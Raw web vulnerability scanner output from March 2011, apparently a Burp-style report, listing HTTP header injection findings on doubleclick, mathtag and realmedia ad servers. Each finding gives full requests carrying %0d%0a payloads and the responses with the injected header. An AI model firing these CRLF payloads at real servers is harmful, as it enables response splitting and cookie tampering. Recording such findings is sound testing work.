GET /7a2ff%0d%0a9d4a8ed3156/N3880.adwords.google.com/B5109627.9;dcove=o;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BeUAfGgGGTenHFsfOlQeE-o3pDun1-pYCkd_lxR-5zZWPRAAQARgBIM-2sAM4AGDJBrIBDHd3dy53b290LmNvbboBCjMwMHgyNTBfYXPIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-YAswhuAIYwAIByALp8KEa4AIA6gIXd29vdC1jb21tdW5pdHkxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA7MC6APtAvUDBAUAxOAEAQ&num=1&sig=AGiWqtxxObGMGdGDDOWnMdJXAptYdjLF1g&client=ca-pub-2332856072838068&adurl=;ord=1302051679? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
The value of REST URL parameter 1 is copied into the Location response header. The payload 231f9%0d%0ac79f87a49a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /231f9%0d%0ac79f87a49a/N4518.247RealMedia/B4955444.24 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/231f9
c79f87a49a/N4518.247RealMedia/B4955444.24:
Date: Sun, 20 Mar 2011 14:02:46 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 3f42a%0d%0a1a2c269b119 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3f42a%0d%0a1a2c269b119/N553.mediamath/B5123370.14 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3f42a
1a2c269b119/N553.mediamath/B5123370.14:
Date: Sun, 20 Mar 2011 14:02:43 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 427da%0d%0a1873d504805 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /427da%0d%0a1873d504805/N553.mediamath/B5123370.39;sz=300x250;pc=;click1=http://pixel.mathtag.com/click/img?mt_aid=62143273837836637&mt_id=111040&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=62143273837836637? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=pub&id=5aW95q2jLzEvTkROQk9FRkNSa0V0TnpRNU55MDBOekZCTFRsQlJqWXRNamszTkVReE4wVkdNek0xL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MjE0MzI3MzgzNzgzNjYzNy8xMTEwNDAvMTAyMDY1LzMvUWk0TlZFWk5SbHYyNzBhYklEZU9pd3Nzb1g4SlNGczg1RjlCN293LWNUay8/InA55NeIGGV4hzZENaajIegtkxo&price=3.757000
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
The value of REST URL parameter 1 is copied into the Location response header. The payload 26cf7%0d%0a4286c6de9c2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /26cf7%0d%0a4286c6de9c2/N553.mediamath/B5123370.4 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/26cf7
4286c6de9c2/N553.mediamath/B5123370.4:
Date: Sun, 20 Mar 2011 14:02:43 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 48f5e%0d%0a86723e2b5e4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /48f5e%0d%0a86723e2b5e4/N5853.3630.1790008898421/B5154579.5 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/48f5e
86723e2b5e4/N5853.3630.1790008898421/B5154579.5:
Date: Sun, 20 Mar 2011 14:02:45 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 9f08c%0d%0aa24e6e6783e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /9f08c%0d%0aa24e6e6783e/N884.AOL-Advertising/B5290576.2 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9f08c
a24e6e6783e/N884.AOL-Advertising/B5290576.2:
Date: Sun, 20 Mar 2011 14:02:45 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 24fc5%0d%0a0c5c8426dac was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /24fc5%0d%0a0c5c8426dac/cm.mtv/games_010111;net=cm;u=,cm-57639981_1300624460,11e4f07c0988ac7,music,ax.300-am.bk-cm.sportsreg-cm.sports_m-cm.ent_m-qc.ac-ex.6-bz.30-bz.51-bz.25-bz.ab-bz.ae-wfm.difi_h-iblocal.sports_h;;cmw=nurl;sz=728x90;net=cm;env=ifr;ord1=595575;contx=music;an=300;dc=d;btg=am.bk;btg=cm.sportsreg;btg=cm.sports_m;btg=cm.ent_m;btg=qc.ac;btg=ex.6;btg=bz.30;btg=bz.51;btg=bz.25;btg=bz.ab;btg=bz.ae;btg=wfm.difi_h;btg=iblocal.sports_h;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://viacom.adbureau.net/hserver/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/24fc5
0c5c8426dac/cm.mtv/games_010111;net=cm;u=,cm-57639981_1300624460,11e4f07c0988ac7,music,ax.300-am.bk-cm.sportsreg-cm.sports_m-cm.ent_m-qc.ac-ex.6-bz.30-bz.51-bz.25-bz.ab-bz.ae-wfm.difi_h-iblocal.sports_h;;cmw=nurl;sz=728x90;net=cm;env=ifr;ord1=595575;contx=music;an=300;dc=d;btg=am.bk;btg=cm.s:
Date: Sun, 20 Mar 2011 12:37:04 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 511aa%0d%0a5a60d0294e5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /511aa%0d%0a5a60d0294e5/lj.homepage/loggedout;a=1;r=0;w=0;c=se;pt=se;vert=_code;sz=728x90;pos=t;tile=1;ord=7173672060? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/511aa
5a60d0294e5/lj.homepage/loggedout;a=1;r=0;w=0;c=se;pt=se;vert=_code;sz=728x90;pos=t;tile=1;ord=7173672060:
Date: Sun, 20 Mar 2011 12:41:26 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 870fd%0d%0a625d057310c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /870fd%0d%0a625d057310c/oiq.rmx/;click0=http://ad.yieldmanager.com/clk?2,13%3B2e75bab3029d4c42%3B12ed3431171,0%3B%3B%3B2825860846,NBAAABt0GACHloQAAAAAAAPDIQAAAAAAAgAAAAYAAAAAAP8AAAABCHmeHQAAAAAAhIAMAAAAAADbUiwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADH0QoAAAAAAAIAAwAAAAAAcBFD0y4BAAAAAAAAADdlNzFjN2Q0LTUyZWUtMTFlMC1hZTRjLTAwMzA0OGQ2ZDNhYwA4nyoAAAA=,,http%3A%2F%2Frotator.adjuggler.com%2Fservlet%2Fajrotator%2F1007517%2F0%2Fvh%3Fz%3Dpdn%26dim%3D753181%26pos%3D7%26kw%3D%26click%3D,;otp=11047;tile=1;sz=728x90;u=rmxli_2904795|surl_http://rotator.adjuggler.com/servlet/ajrotator/1007517/0/vh?z=pdn&dim=753181&pos=7&kw=&click=|pr_0.3500|pid_298720;ord=4549932463560253? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NBAAABt0GACHloQAAAAAAAPDIQAAAAAAAgAAAAYAAAAAAP8AAAABCHmeHQAAAAAAhIAMAAAAAADbUiwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADH0QoAAAAAAAIAAwAAAAAAR7bz.dR4wT.2KFyPwvXYP-N6FK5H4co.MzMzMzMz4z9nZmZmZmbWPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACfI8Gb.tjOCUrprrxPD33NNXpvaMrAs.Da0NhMAAAAAA==,,http%3A%2F%2Frotator.adjuggler.com%2Fservlet%2Fajrotator%2F1007517%2F0%2Fvh%3Fz%3Dpdn%26dim%3D753181%26pos%3D7%26kw%3D%26click%3D,Z%3D728x90%26s%3D1602587%26_salt%3D225907243%26B%3D10%26u%3Dhttp%253A%252F%252Frotator.adjuggler.com%252Fservlet%252Fajrotator%252F1007517%252F0%252Fvh%253Fz%253Dpdn%2526dim%253D753181%2526pos%253D7%2526kw%253D%2526click%253D%26r%3D0,7e71c7d4-52ee-11e0-ae4c-003048d6d3ac
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
The value of REST URL parameter 1 is copied into the Location response header. The payload 75330%0d%0a2d5d580153d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /75330%0d%0a2d5d580153d/teennick.nol/atf_j_s/shows/the_nightlife/index;sec0=shows;sec1=the_nightlife;sec2=index;pos=atf;cat=2;!category=hs_the_nightlife;show=hs_the_nightlife;demo=D;tag=adj;mtype=standard;sz=6x6;tile=1;u=pos-atf%7Ccat-2%7C!category-hs_the_nightlife%7Cshow-hs_the_nightlife%7Cdemo-D%7Ctag-adj%7Cmtype-standard%7Csz-6x6%7Ctile-1;ord=964462979417294200? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.teennick.com/shows/the-nightlife
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/75330
2d5d580153d/teennick.nol/atf_j_s/shows/the_nightlife/index;sec0=shows;sec1=the_nightlife;sec2=index;pos=atf;cat=2;!category=hs_the_nightlife;show=hs_the_nightlife;demo=D;tag=adj;mtype=standard;sz=6x6;tile=1;u=pos-atf|cat-2|!category-hs_the_nightlife|show-hs_the_nightlife|demo-D|tag-adj|mtype:
Date: Sun, 20 Mar 2011 14:05:31 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 53f28%0d%0ab4eaf05d29e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /53f28%0d%0ab4eaf05d29e/N1558.advertising.com/B3897970.13 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/53f28
b4eaf05d29e/N1558.advertising.com/B3897970.13:
Date: Sun, 20 Mar 2011 14:02:51 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 9897d%0d%0a37e2c0d48a4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /9897d%0d%0a37e2c0d48a4/N3340.247realmedia.com/B5245409.18 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9897d
37e2c0d48a4/N3340.247realmedia.com/B5245409.18:
Date: Sun, 20 Mar 2011 14:02:48 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 483af%0d%0a3b55be4a6ed was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /483af%0d%0a3b55be4a6ed/N4518.247RealMedia/B4955444.24 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/483af
3b55be4a6ed/N4518.247RealMedia/B4955444.24:
Date: Sun, 20 Mar 2011 14:02:51 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 53bf4%0d%0a994ab283e15 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /53bf4%0d%0a994ab283e15/N5853.3630.1790008898421/B5154579.5 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/53bf4
994ab283e15/N5853.3630.1790008898421/B5154579.5:
Date: Sun, 20 Mar 2011 14:02:52 GMT
Server: GFE/2.0
Connection: close
The value of the exch request parameter is copied into the x-mm-debug response header. The payload d437a%0d%0a0b61def368b was submitted in the exch parameter. This caused a response containing an injected HTTP header.
Request
GET /iframe/notify?exch=d437a%0d%0a0b61def368b&id=5aW95q2jLzEvTkROQk9FRkNSa0V0TnpRNU55MDBOekZCTFRsQlJqWXRNamszTkVReE4wVkdNek0xL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MjE0MzI3MzgzNzgzNjYzNy8xMTEwNDAvMTAyMDY1LzMvUWk0TlZFWk5SbHYyNzBhYklEZU9pd3Nzb1g4SlNGczg1RjlCN293LWNUay8/InA55NeIGGV4hzZENaajIegtkxo&price=3.757000 HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
Referer: http://www.woot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mt_mop=10004:1299934992|1:1297862934|10001:1297818481|11:1299460723|2:1299285586|3:1299090747|4:1299460679|5:1297863542|9:1297862322; ts=1300283399; uuid=4d5b2371-3928-7a83-24fb-d52328f5624b
Response
HTTP/1.1 404 Not found
Date: Sun, 20 Mar 2011 12:36:33 GMT
Server: MMBD/3.4.6
Content-Type: text/html; charset=utf-8
Content-Length: 18
x-mm-debug: exchange not found - d437a
0b61def368b
x-mm-host: ewr-bidder-x4
Connection: keep-alive
The value of REST URL parameter 4 is copied into the OAS_DE_ERROR response header. The payload 784d2%0d%0a594567822af was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /RealMedia/ads/adstream.cap/784d2%0d%0a594567822af HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BCN2010110741=2; RMFL=011Pxp1fU10KeT; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0c45525d5f4f58455e445a4a423660; NXCLICK2=011Pxp1fNX_TRACK_Nationalgeographic/Retarget_Natgeorealhomepage_Nonsecure!y!B3!KeT!ppm3; OAX=rcHW801i4doAAvyI; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011Q1HsmO2016kC|O1016oi|O1016oj|O1016vE|O1016x1|O1016xy|O1016yW|O10170Y|O20171t|O10172C|O20179T|O10179n; S247=3SHMdODZXwiULLqkivponR9TFGKNXO3633WY_nuhPf0QQPdf7d3Vdqg; S247S=1;
Response
HTTP/1.1 400 Bad Request
Date: Sun, 20 Mar 2011 14:01:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
OAS_DE_ERROR: OAS-Cap: No query string found. request to 'network.realmedia.com' for '/RealMedia/ads/adstream.cap/784d2
594567822af', referer '', handler 'cap-add'
Content-Length: 313
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0c45525d5f4f58455e445a4a423660;expires=Sun, 20-Mar-2011 14:02:15 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>400 Bad Request</title> </head><body> <h1>Bad Request</h1> <p>Your browser sent a request that this server could not understand.< ...[SNIP]...
The value of the c request parameter is copied into the Set-Cookie response header. The payload a4db0%0d%0a5a00c79db3e was submitted in the c parameter. This caused a response containing an injected HTTP header.
The value of the dv request parameter is copied into the OAS_DE_ERROR response header. The payload cc955%0d%0aae4dc5c54c4 was submitted in the dv parameter. This caused a response containing an injected HTTP header.
Response
HTTP/1.1 500 Internal Server Error
Date: Sun, 20 Mar 2011 13:31:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
OAS_DE_ERROR: error converting 'cc955
ae4dc5c54c4' value to numeric value [i]. request to 'network.realmedia.com' for '/RealMedia/ads/adstream.cap/1379005222', referer 'http://redcated/APM/iview/142856445/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=0000133c0000000000000000/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1/relocate=', handler 'cap-add'
Content-Length: 621
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Sun, 20-Mar-2011 05:22:14 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>500 Internal Server Error</title> </head><body> <h1>Internal Server Error</h1> <p>The server encountered an internal error or mis ...[SNIP]...
The value of the s request parameter is copied into the OAS_DE_ERROR response header. The payload a9638%0d%0ad85165efc26 was submitted in the s parameter. This caused a response containing an injected HTTP header.
Response
HTTP/1.1 500 Internal Server Error
Date: Sun, 20 Mar 2011 13:31:36 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
OAS_DE_ERROR: Cannot convert 'a9638
d85165efc26' to bool. request to 'network.realmedia.com' for '/RealMedia/ads/adstream.cap/1379005222', referer 'http://redcated/APM/iview/142856445/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=0000133c0000000000000000/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1/relocate=', handler 'cap-add'
Content-Length: 621
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Sun, 20-Mar-2011 05:22:14 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>500 Internal Server Error</title> </head><body> <h1>Internal Server Error</h1> <p>The server encountered an internal error or mis ...[SNIP]...
The value of REST URL parameter 4 is copied into the OAS_DE_ERROR response header. The payload 6a8b9%0d%0a06fba2b5fbf was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /RealMedia/ads/adstream.cap/6a8b9%0d%0a06fba2b5fbf HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BCN2010110741=2; RMFL=011Pxp1fU10KeT; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0c45525d5f4f58455e445a4a423660; NXCLICK2=011Pxp1fNX_TRACK_Nationalgeographic/Retarget_Natgeorealhomepage_Nonsecure!y!B3!KeT!ppm3; OAX=rcHW801i4doAAvyI; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011Q1HsmO2016kC|O1016oi|O1016oj|O1016vE|O1016x1|O1016xy|O1016yW|O10170Y|O20171t|O10172C|O20179T|O10179n; S247=3SHMdODZXwiULLqkivponR9TFGKNXO3633WY_nuhPf0QQPdf7d3Vdqg; S247S=1;
Response
HTTP/1.1 400 Bad Request
Date: Sun, 20 Mar 2011 14:01:14 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
OAS_DE_ERROR: OAS-Cap: No query string found. request to 'network.realmedia.com' for '/RealMedia/ads/adstream.cap/6a8b9
06fba2b5fbf', referer '', handler 'cap-add'
Content-Length: 313
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0c45525d5f4f58455e445a4a423660;expires=Sun, 20-Mar-2011 14:02:14 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>400 Bad Request</title> </head><body> <h1>Bad Request</h1> <p>Your browser sent a request that this server could not understand.< ...[SNIP]...
The value of the c request parameter is copied into the Set-Cookie response header. The payload 4abb5%0d%0aa0d57ae0292 was submitted in the c parameter. This caused a response containing an injected HTTP header.
The value of the dv request parameter is copied into the OAS_DE_ERROR response header. The payload fe780%0d%0a47fbab57590 was submitted in the dv parameter. This caused a response containing an injected HTTP header.
Response
HTTP/1.1 500 Internal Server Error
Date: Sun, 20 Mar 2011 13:31:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
OAS_DE_ERROR: error converting 'fe780
47fbab57590' value to numeric value [i]. request to 'network.realmedia.com' for '/RealMedia/ads/adstream.cap/574659390', referer 'http://redcated/APM/iview/142856443/direct;wi.300;hi.250/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014700000000000000000/height=250/width=300/site=SW.NOL/aamsz=300X250/NCP=1/relocate=', handler 'cap-add'
Content-Length: 621
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Sun, 20-Mar-2011 05:22:13 GMT;path=/;httponly
